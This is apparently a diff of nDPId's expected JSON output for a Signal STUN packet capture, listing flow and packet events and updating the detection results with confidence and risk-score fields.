 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1636901998654,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1636901998654,"pkt":"mt9Y+uvcCL6sCxduCABFAABMVVMAAOMBFpsjnnrTwKgMqQMDaO0AAAAARQAAMNxHQAAgERKzwKgMqSOeetO6lwG7ABwfgwABAAAhEqRCQ01KSFFMTnpxN1Q0"}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"proto":"ICMP.AmazonAWS","breed":"Acceptable","category":"Network"},"entropy":5.050556}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636901998654,"flow_last_seen":1636901998654,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1636901998654,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.050556}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1636901998654,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1636901998654,"pkt":"mt9Y+uvcCL6sCxduCABFAABMVVQAAOMBFpojnnrTwKgMqQMDaO0AAAAARQAAMNxIQAAgERKywKgMqSOeetOUUgG7ABwljAABAAAhEqRCVjVicmFhSFdCOW5q"}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1636901998657,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1636901998657,"pkt":"mt9Y+uvcCL6sCxduCABFAABUVVUAAOMBFpEjnnrTwKgMqQMDaPUAAAAARQAAONxJQAAgERKpwKgMqSOeetO6lwG7ACSHhgADAAghEqRCdG90WXN0M3RzbnZtABkABBEAAAA="}
 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1636901998660,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":1636901998660,"pkt":"mt9Y+uvcCL6sCxduCABFIAB49klAAOMRNUgjnnrTwKgMqQ2WupcAZEK5ARMASCESpEJRck1mY3NySEUrbG4ACQAQAAAEAVVuYXV0aG9yaXplZAAVABA0YTlmNTljZmZlODk0NGE5ABQACnNpZ25hbC5vcmcAAIAiAAROb25lgCgABLOFpWg="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1636901998660,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"ts_msec":1636901998660,"pkt":"mt9Y+uvcCL6sCxduCABFIABw9kpAAOQRNE8jnnrTwKgMqQ2WlFIAXFMAAQEAQCESpEJTRld4cWpibUxkeFoAIAAIAAEPi3w9RVEAAQAIAAEumV0v4ROAKwAIAAENliOeetOALAAIAAEAUCOeetOAIgAETm9uZYAoAASDCssQ"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998644,"flow_last_seen":1636901998660,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1636901998660,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1636901998663,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1636901998663,"pkt":"CL6sCxdumt9Y+uvcCABFAAA43E9AAEAR8qLAqAypI55605RSAbsAJLdQAAMACCESpEJxcXQycnUyTXoya28AGQAEEQAAAA=="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1636901998865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998865,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwgexAAEARxQLAqAyprP15f7qXS2YAHLUpAAEAACESpEJFRDdhYWpCejZ6NGY="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1636901998865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998865,"pkt":"CL6sCxdumt9Y+uvcCABFAAAwge1AAEARxQHAqAyprP15f5RSS2YAHI3jAAEAACESpEJHZko4WW5Ca1ZEVTk="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1636901998885,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998885,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3FdAAEAR8qLAqAypI55607qXAbsAHB+DAAEAACESpEJDTUpIUUxOenE3VDQ="}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998637,"flow_last_seen":1636901998885,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1636901998885,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1636901998637,"flow_last_seen":1636901998885,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1636901998885,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1636901998885,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1636901998885,"pkt":"CL6sCxdumt9Y+uvcCABFAAAw3FhAAEAR8qHAqAypI55605RSAbsAHCWMAAEAACESpEJWNWJyYWFIV0I5bmo="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1636901998967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1636901998967,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8uXcAACUR6Gus\/Xl\/wKgMqUtmlFIAKLt8AQEADCESpEJHZko4WW5Ca1ZEVTkAIAAIAAEPi3w9RVE="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1636901998967,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1636901998967,"pkt":"mt9Y+uvcCL6sCxduCABFgAA8OUIAACYRZyGs\/Xl\/wKgMqUtmupcAKOLDAQEADCESpEJFRDdhYWpCejZ6NGYAIAAIAAEPinw9RVE="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901998637,"flow_last_seen":1636901999417,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636901999417,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1636901998637,"flow_last_seen":1636901999417,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636901999417,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1636902000024,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1636902000024,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8d+5AAEARXt\/AqAypEsODj7qX0yYAaAl7AAEATCESpEJCeElWSlVyQXpFMWUABgAJMUVaczo3a3NzAAAAwFcABAADAAqAKgAINhoW4DAHa9AAJAAEbn8e\/wAIABTJ3jNA\/lTtI\/cIgWHSZfc\/Jdi3xoAoAAQAuGXB"}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000024,"flow_last_seen":1636902000024,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1636902000024,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1636902000073,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1636902000073,"pkt":"CL6sCxdumt9Y+uvcCABFAAB8d\/NAAEARXtrAqAypEsODj7qX8DoAaE2WAAEATCESpEI3OHB2NXh3VHhSY2IABgAJMUVaczo3a3NzAAAAwFcABAADAAqAKgAINhoW4DAHa9AAJAAEbn8e\/wAIABQCGGRp5dlaWaRPyMCnCJTZLYHOaoAoAATw85Tp"}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1636902000073,"flow_last_seen":1636902000073,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1636902000073,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1636902000102,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1636902000102,"pkt":"mt9Y+uvcCL6sCxduCABFSABcw7JAAAYRTPMSw4OPwKgMqdMmupcASMDpAQEALCESpEJCeElWSlVyQXpFMWUAIAAIAAEPinw9RVEACAAUIB3cDwXbxtjdDKqyJ3Jq4xtLsfaAKAAEpnvqQg=="}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1636902000107,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1636902000107,"pkt":"mt9Y+uvcCL6sCxduCABFSAB8w7NAAAYRTNISw4OPwKgMqdMmupcAaK01AAEATCESpEJBbDNpSTF1eStSR1UABgAJN2tzczoxRVpzAAAAwFcABAAAA+eAKQAIiflXHs5q0dMAJAAEbgAg\/wAIABQSmjpLVWLcQ98KImy+h9G3RC6S1IAoAATBitk4"}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1636902000142,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1636902000142,"pkt":"mt9Y+uvcCL6sCxduCABFAABcw7ZAAAYRTTcSw4OPwKgMqfA6upcASKsWAQEALCESpEI3OHB2NXh3VHhSY2IAIAAIAAEPjnw9RVEACAAUJEyhW79\/NO7EtgfmN47ncd2\/SCyAKAAE6dNIHg=="}
 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1636902000142,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1636902000142,"pkt":"mt9Y+uvcCL6sCxduCABFAAB8w7dAAAYRTRYSw4OPwKgMqfA6upcAaP5PAAEATCESpEIwbFM2UjdmdjFzOTMABgAJN2tzczoxRVpzAAAAwFcABAADA4SAKQAIiflXHs5q0dMAJAAEbn8g\/wAIABT+u0FmMYg2qxKb1bY78Qe06uM1KoAoAAQrkPMA"}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901956930,"flow_last_seen":1636901987908,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956899,"flow_last_seen":1636901980718,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936065,"flow_last_seen":1636901939886,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1636902000024,"flow_last_seen":1636902000208,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":488,"flow_avg_l4_payload_len":81,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956900,"flow_last_seen":1636901978278,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
-00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","ndpi": {"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
